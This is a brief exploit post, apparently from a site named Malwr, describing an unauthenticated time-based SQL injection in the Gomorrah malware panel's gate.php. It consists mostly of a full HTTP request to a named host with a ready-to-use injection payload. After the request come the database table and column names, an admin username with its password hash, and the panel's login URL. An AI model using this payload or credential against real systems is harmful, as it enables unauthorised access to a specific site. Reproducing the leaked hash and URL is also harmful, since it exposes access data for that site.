Gomorrah UNAUTHENTICATED SQL INJECTION - Malwr

Gomorrah UNAUTHENTICATED SQL INJECTION

Date: 2020-04-30

Unauthenticated Time Based Sql Injection

GET /images/jaf3/gate.php?hwid=1%27%20and%20(select%20sleep(5)%20from%20dual%20where%20(select%20username%20from%20users%20limit%200,1)%20like%20%27admin%%27)--%20- HTTP/1.1
Host: www.florapansiyonotel.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Payload: ' and (select sleep(5) from dual where (select username from users limit 0,1) like 'admin%')-- -

 

Admin table : users

Users colums: id_user,username,password

admin:2948ad5cd2b3754027f52c7aa35c0701

Login: http://www.florapansiyonotel.com/images/jaf3/Panel/login.php